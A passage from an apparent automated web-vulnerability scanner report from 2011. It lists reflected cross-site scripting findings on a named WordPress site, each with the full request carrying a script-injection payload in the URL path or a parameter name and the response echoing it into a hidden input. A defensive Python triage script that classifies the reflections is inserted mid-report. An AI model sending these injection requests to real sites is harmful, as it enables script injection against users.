This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin4fb59"><script>alert(1)</script>9ce1fb0d6b9/css/colors-fresh.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:15:25 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-admin4fb59\"><script>alert(1)</script>9ce1fb0d6b9/css/colors-fresh.css" type="hidden" />
...[SNIP]...

1.139. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 108f1"><script>alert(1)</script>2542fce189a was submitted in the REST URL parameter 2. This input was echoed as 108f1\"><script>alert(1)</script>2542fce189a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css108f1"><script>alert(1)</script>2542fce189a/colors-fresh.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:46 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:15:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-admin/css108f1\"><script>alert(1)</script>2542fce189a/colors-fresh.css" type="hidden" />
...[SNIP]...

1.140. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25734"><script>alert(1)</script>2b4c433f186 was submitted in the REST URL parameter 3. This input was echoed as 25734\"><script>alert(1)</script>2b4c433f186 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css/colors-fresh.css25734"><script>alert(1)</script>2b4c433f186 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:16:07 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:16:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-admin/css/colors-fresh.css25734\"><script>alert(1)</script>2b4c433f186" type="hidden" />
...[SNIP]...

1.141. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/login.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 976b6"><script>alert(1)</script>ef7c2ff4d9b was submitted in the REST URL parameter 1. This input was echoed as 976b6\"><script>alert(1)</script>ef7c2ff4d9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin976b6"><script>alert(1)</script>ef7c2ff4d9b/css/login.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:14:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:14:13 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-admin976b6\"><script>alert(1)</script>ef7c2ff4d9b/css/login.css" type="hidden" />
...[SNIP]...

1.142. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/login.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2a36"><script>alert(1)</script>3f9128e0065 was submitted in the REST URL parameter 2. This input was echoed as c2a36\"><script>alert(1)</script>3f9128e0065 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/cssc2a36"><script>alert(1)</script>3f9128e0065/login.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:14:43 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:14:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-admin/cssc2a36\"><script>alert(1)</script>3f9128e0065/login.css" type="hidden" />
...[SNIP]...

1.143. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/login.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16a7d"><script>alert(1)</script>e31de724c2f was submitted in the REST URL parameter 3. This input was echoed as 16a7d\"><script>alert(1)</script>e31de724c2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css/login.css16a7d"><script>alert(1)</script>e31de724c2f HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:04 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:15:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-admin/css/login.css16a7d\"><script>alert(1)</script>e31de724c2f" type="hidden" />
...[SNIP]...

1.144. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb603"><script>alert(1)</script>854924fe41d was submitted in the REST URL parameter 1. This input was echoed as fb603\"><script>alert(1)</script>854924fe41d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentfb603"><script>alert(1)</script>854924fe41d/plugins/sexybookmarks/css/comfeed.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:21 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:17:21 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentfb603\"><script>alert(1)</script>854924fe41d/plugins/sexybookmarks/css/comfeed.css" type="hidden" />
...[SNIP]...

1.145. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c934"><script>alert(1)</script>212a21e8ebb was submitted in the REST URL parameter 2. This input was echoed as 9c934\"><script>alert(1)</script>212a21e8ebb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins9c934"><script>alert(1)</script>212a21e8ebb/sexybookmarks/css/comfeed.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:44 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:17:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins9c934\"><script>alert(1)</script>212a21e8ebb/sexybookmarks/css/comfeed.css" type="hidden" />
...[SNIP]...

1.146. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79afa"><script>alert(1)</script>6f363fd4d80 was submitted in the REST URL parameter 3. This input was echoed as 79afa\"><script>alert(1)</script>6f363fd4d80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks79afa"><script>alert(1)</script>6f363fd4d80/css/comfeed.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:07 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks79afa\"><script>alert(1)</script>6f363fd4d80/css/comfeed.css" type="hidden" />
...[SNIP]...

1.147. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 887ac"><script>alert(1)</script>e3828ad6376 was submitted in the REST URL parameter 4. This input was echoed as 887ac\"><script>alert(1)</script>e3828ad6376 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/css887ac"><script>alert(1)</script>e3828ad6376/comfeed.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css887ac\"><script>alert(1)</script>e3828ad6376/comfeed.css" type="hidden" />
...[SNIP]...

1.148. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37a4e"><script>alert(1)</script>7f607892514 was submitted in the REST URL parameter 5. This input was echoed as 37a4e\"><script>alert(1)</script>7f607892514 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/css/comfeed.css37a4e"><script>alert(1)</script>7f607892514 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:12 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:12 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css37a4e\"><script>alert(1)</script>7f607892514" type="hidden" />
...[SNIP]...

1.149. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc0d"><script>alert(1)</script>0cabb235182 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fc0d\"><script>alert(1)</script>0cabb235182 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
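A triage check for the entries in this section, added here as an example that is not part of the report: given a captured response body and the random prefix and suffix the scanner wrapped around its payload, it classifies how the quote and angle brackets came back (unencoded, backslash-escaped, entity-encoded, percent-encoded) and says whether the reflection still breaks out of a double-quoted attribute. The sample bodies are constructed from the report's own reflected lines for the path-segment and parameter-name vectors, plus two encoded variants written for contrast; the function names are illustrative.

```python
import re

# Constructed samples: the first two are the reflected lines from this report
# (path-segment vector and parameter-name vector); the last two are encoded
# variants written for contrast and do not appear in the report.
SAMPLES = {
    "path_segment": ("9c934", "212a21e8ebb",
        '<input name="u" id="url" value="http://www.installsoftware.com/wp-content/'
        'plugins9c934\\"><script>alert(1)</script>212a21e8ebb/sexybookmarks/css/comfeed.css"'
        ' type="hidden" />'),
    "param_name": ("6fc0d", "0cabb235182",
        '<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/'
        'sexybookmarks/css/comfeed.css?6fc0d\\"><script>alert(1)</script>0cabb235182=1"'
        ' type="hidden" />'),
    "entity_encoded": ("6fc0d", "0cabb235182",
        '<input name="u" id="url" value="http://www.installsoftware.com/?6fc0d'
        '&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;0cabb235182=1" type="hidden" />'),
    "percent_encoded": ("6fc0d", "0cabb235182",
        '<input name="u" id="url" value="http://www.installsoftware.com/?6fc0d'
        '%22%3E%3Cscript%3Ealert(1)%3C/script%3E0cabb235182=1" type="hidden" />'),
}


def classify_reflection(body: str, prefix: str, suffix: str) -> str:
    """Find the scanner marker (prefix ... suffix) in a response body and report
    how the leading quote and angle brackets of the payload were echoed.
    Returns one of: not_reflected, raw, backslash_escaped, entity_encoded,
    percent_encoded, other."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S)
    if not m:
        return "not_reflected"
    echoed = m.group(1)
    if echoed.startswith('"><script>'):
        return "raw"
    if echoed.startswith('\\"><script>'):
        return "backslash_escaped"
    if echoed.startswith("&quot;&gt;&lt;script&gt;"):
        return "entity_encoded"
    if echoed.lower().startswith("%22%3e%3cscript%3e"):
        return "percent_encoded"
    return "other"


def exploitable_in_attribute(kind: str) -> bool:
    """Inside a double-quoted HTML attribute a backslash is an ordinary
    character, so raw and backslash-escaped echoes both terminate the
    attribute and the tag; entity- and percent-encoded echoes do not."""
    return kind in ("raw", "backslash_escaped")


def triage(samples=SAMPLES) -> dict:
    """Classify every sample body; returns {name: (kind, exploitable)}."""
    result = {}
    for name, (prefix, suffix, body) in samples.items():
        kind = classify_reflection(body, prefix, suffix)
        result[name] = (kind, exploitable_in_attribute(kind))
    return result


if __name__ == "__main__":
    for name, (kind, exploitable) in triage().items():
        print(f"{name:16s} {kind:18s} exploitable={exploitable}")
```

Run against the two lines the report actually shows, both vectors classify as backslash_escaped and exploitable, which matches the scanner's "Certain" confidence; a reflection that came back entity-encoded or percent-encoded would be the sign that output encoding for the attribute context is in place.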

Request

GET /wp-content/plugins/sexybookmarks/css/comfeed.css?6fc0d"><script>alert(1)</script>0cabb235182=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:16:28 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:16:28 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css?6fc0d\"><script>alert(1)</script>0cabb235182=1" type="hidden" />
...[SNIP]...

1.150. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98b6c"><script>alert(1)</script>69a51346be6 was submitted in the REST URL parameter 1. This input was echoed as 98b6c\"><script>alert(1)</script>69a51346be6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content98b6c"><script>alert(1)</script>69a51346be6/plugins/sexybookmarks/css/comfeed.css/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
